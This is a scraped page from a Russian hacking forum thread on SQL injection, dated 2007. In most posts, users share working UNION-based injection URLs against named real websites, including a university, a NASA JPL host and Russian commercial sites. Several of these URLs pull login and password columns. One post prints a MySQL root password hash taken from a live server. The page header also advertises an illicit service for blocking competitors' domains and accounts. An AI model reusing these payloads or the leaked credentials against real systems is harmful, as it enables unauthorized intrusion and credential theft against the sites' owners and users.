УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 300 из 1242

300

Опции темы

Поиск в этой теме

Опции просмотра

#2991

29.08.2007, 20:43

l-l00K

Leaders of Antichat - Level 4

Регистрация: 26.11.2006

Сообщений: 237

Провел на форуме:
13395217

Репутация: 2097

amp.ru

Код:

http://www.amp.ru/index.php?page=6+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+FROM+INFORMATION_SCHEMA.TABLES+--+

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

sql

#2992

29.08.2007, 23:17

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

sql

Цитата:

Сообщение от Ponchik

Покопался, ничё не нащёл, выбрасывать жалко, может комунить и пригодится

_http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,1 3/*

названия таблиц довольно тривиальные

Цитата:

http://www.teamarena.ru/demo/311+UNION+SELECT+1,2,3,concat_ws(0x3a,user_id,user _login,user_password),5,6,7,8,9,10,11,12,13+from+u ser/*

прямого вывода нет

#2993

30.08.2007, 01:42

bulbazaur

Участник форума

Регистрация: 10.09.2006

Сообщений: 160

Провел на форуме:
619440

Репутация: 96

Отправить сообщение для bulbazaur с помощью ICQ

типо первый мой скуль))

Код HTML:

http://www.utdallas.edu/calendar/event.php?id=-1175532750+union+select+1,concat(user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13/*

Последний раз редактировалось bulbazaur; 30.08.2007 в 01:46..

#2994

30.08.2007, 03:21

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

вроде не баян, пока на ачате искал, нашел чето похожее, но решил раскрыть тему, к томуже инъекция в другом скрипте:

Код:

http://www-robotics.jpl.nasa.gov/news/newsStory.cfm?NewsID=-69%20union%20select%201,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71),11,12,13,14,15%20from%20mysql.user/*

root:*1CB7A709BB1423D94D5F2C14E2E929F17BEBF122

__________________
Карфаген должен быть разрушен...

#2995

30.08.2007, 06:57

Calcutta

Постоянный

Регистрация: 06.08.2007

Сообщений: 347

Провел на форуме:
2584838

Репутация: 770

Отправить сообщение для Calcutta с помощью ICQ

http://www.elephant.ru/index.php?item=3891+union+select+version(),2,datab ase(),user(),5,6,7,8,9,10,11,12,13,14,15,16/*

elephantru@localhost
elephantru
4.1.22-standard-log
дальше не раскопал :-/

#2996

30.08.2007, 13:24

l-l00K

Leaders of Antichat - Level 4

Регистрация: 26.11.2006

Сообщений: 237

Провел на форуме:
13395217

Репутация: 2097

СПОРТклуб

Код:

http://www.sportclub.ru/news.php?id=-46+UNION+SELECT+1,2,3,concat(login,char(58),password),concat(user(),char(58),version(),char(58),database()),6,7,8,9+from+users+--+

После того как я зашел на форум, интерес к сайту пропал...

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

#2997

30.08.2007, 13:39

iRedX

Участник форума

Регистрация: 18.06.2002

Сообщений: 126

Провел на форуме:
65642

Репутация: 46

Отправить сообщение для iRedX с помощью ICQ

Отправить сообщение для iRedX с помощью MSN

motofan.ru

http://top.motofan.ru/index.php?act=faq

в поле поиска вставить: '/**/and/**/1=2/**/union/**/select/**/version(),database(),user()/*

#2998

30.08.2007, 14:27

Dr.Frank

Постоянный

Регистрация: 31.07.2002

Сообщений: 312

Провел на форуме:
1212427

Репутация: 187

Отправить сообщение для Dr.Frank с помощью ICQ

irkutsk.rfn.ru
http://irkutsk.rfn.ru/rnews.html?id=23639+order+by+11--&cid=7

Дальше не смог... UNION не работает =(

#2999

30.08.2007, 16:14

~~t00th~~

Banned

Регистрация: 15.07.2007

Сообщений: 39

Провел на форуме:
1122110

Репутация: 43

Цитата:

Сообщение от Calcutta

http://www.elephant.ru/index.php?item=3891+union+select+1,2,concat(name,0 x3a,login,),4,5,6,7,8,9,10,11,12,13,14,15,16+from+ users/*

#3000

30.08.2007, 16:42

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

Провел на форуме:
1373642

Репутация: 569

информационное агенство

4 мускул
код:
http://www.context-ua.com/km/forum1 .php?act=forum add&botn=456&top=-4' +union+ select+ 1 ,2 ,con cat(lo gin,pas s),4 ,5 ,6 +from+users/*

дальше не смог

Страница 300 из 1242

300

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход